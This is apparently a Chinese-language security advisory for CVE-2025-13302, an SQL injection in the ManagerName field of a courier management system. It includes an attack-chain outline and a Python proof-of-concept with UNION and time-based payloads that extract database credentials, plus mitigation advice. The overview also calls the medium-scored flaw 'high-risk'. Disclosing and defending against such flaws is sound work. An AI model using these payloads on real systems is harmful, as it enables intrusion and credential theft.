CVE-2025-13302: code-projects Courier Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13302

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Courier Management System 1.0

漏洞概述

CVE-2025-13302是code-projects Courier Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/add-new-officer.php文件中的ManagerName参数，攻击者可通过构造恶意SQL语句实现未授权数据库操作。Courier Management System是一款面向快递公司的管理平台，用于管理快递员信息、订单跟踪和物流调度等核心业务功能。由于该漏洞需要高权限用户才能利用（PR:H），但攻击可远程发起（AV:N），对系统的机密性、完整性和可用性均造成低至中等程度的影响（均为L级）。目前该漏洞的利用代码已在公开渠道发布，攻击者无需复杂技术手段即可复制利用，对使用该系统的企业构成现实威胁。建议管理员立即采取修复措施，避免敏感业务数据泄露或被恶意篡改。

技术细节

该漏洞属于经典的SQL注入（SQL Injection）类型，存在于add-new-officer.php文件的表单处理逻辑中。漏洞根源在于应用程序对用户输入的ManagerName参数缺乏有效的输入验证和SQL语句预编译处理。攻击者可通过在ManagerName字段中注入SQL语句片段，如使用单引号(')、UNION SELECT、布尔盲注或时间盲注等技术，实现未授权数据库访问。具体利用方式包括：1）通过UNION注入获取数据库中的敏感信息，如管理员账户和密码哈希；2）通过布尔盲注推断数据库结构和其他表的信息；3）利用时间盲注在无回显的情况下逐步提取数据。由于该系统用于管理快递公司的核心业务数据，攻击成功可能导致客户信息、快递单号、财务数据等敏感信息泄露，甚至可通过SQL语句修改数据库内容或执行系统命令。CVSS 3.1评分4.7反映了该漏洞在特定条件下（需高权限账号）仍具有可利用性和实际危害。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Courier Management System版本，确认add-new-officer.php文件存在并了解其功能

STEP 2

步骤2: 权限获取

攻击者通过社工、弱口令或其他漏洞获取系统的高权限账户（如管理员账号），因为该漏洞需要PR:H权限

STEP 3

步骤3: SQL注入构造

使用SQL注入技术（如UNION注入、布尔盲注或时间盲注）构造恶意ManagerName参数，绕过输入验证

STEP 4

步骤4: 数据库操作

利用SQL注入执行未授权的数据库查询，提取敏感信息如用户账户、密码哈希、快递单号、客户数据等

STEP 5

步骤5: 持久化控制

通过SQL注入写入恶意数据或创建后门账户，实现对系统的持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13302 SQL Injection PoC
# Target: code-projects Courier Management System 1.0
# File: /add-new-officer.php
# Parameter: ManagerName

import requests
import sys
from urllib.parse import urlencode

target_url = "http://target.com/add-new-officer.php"

# Basic SQL injection test payload
payloads = [
    "'",  # Basic detection
    "admin' OR '1'='1",  # Authentication bypass attempt
    "' UNION SELECT 1,2,3,4,5,6-- -",  # UNION-based injection
    "' AND SLEEP(5)-- -",  # Time-based blind injection
]

def test_sql_injection(url, param_name, payload):
    """Test for SQL injection vulnerability"""
    data = {
        param_name: payload,
        # Add other required form fields
        "submit": "Add Officer"
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

# UNION-based data extraction example
def extract_database_info(url):
    """Extract database information using UNION injection"""
    # Extract current database name
    payload = "' UNION SELECT 1,database(),3,4,5,6-- -"
    result = test_sql_injection(url, "ManagerName", payload)
    print(f"[*] Database info: {result}")
    
    # Extract user information
    payload = "' UNION SELECT 1,CONCAT(user,0x3a,password),3,4,5,6 FROM mysql.user-- -"
    result = test_sql_injection(url, "ManagerName", payload)
    print(f"[*] User info: {result}")

if __name__ == "__main__":
    print("[*] CVE-2025-13302 SQL Injection Test")
    print("[*] Target:", target_url)
    
    for payload in payloads:
        print(f"\n[*] Testing payload: {payload}")
        result = test_sql_injection(target_url, "ManagerName", payload)
        if result and ("error" in result.lower() or "sql" in result.lower()):
            print("[+] Potential SQL injection detected!")

影响范围

code-projects Courier Management System 1.0

防御指南

临时缓解措施

立即限制对/add-new-officer.php文件的访问，仅允许受信任的管理员IP访问。在Web应用防火墙中配置SQL注入防护规则，监控异常的SQL语句模式。暂时禁用add-new-officer功能，待官方发布安全补丁后再恢复使用。同时检查系统日志，排查是否存在已遭受攻击的痕迹。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13302
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13302
3 Details https://www.cvedetails.com/cve/CVE-2025-13302/
4 VulDB https://vuldb.com/cve/CVE-2025-13302
5 Link https://code-projects.org/
6 Link https://github.com/labi1106/cve/issues/1
7 Link https://vuldb.com/?ctiid.332643
8 Link https://vuldb.com/?id.332643
9 Link https://vuldb.com/?submit.691791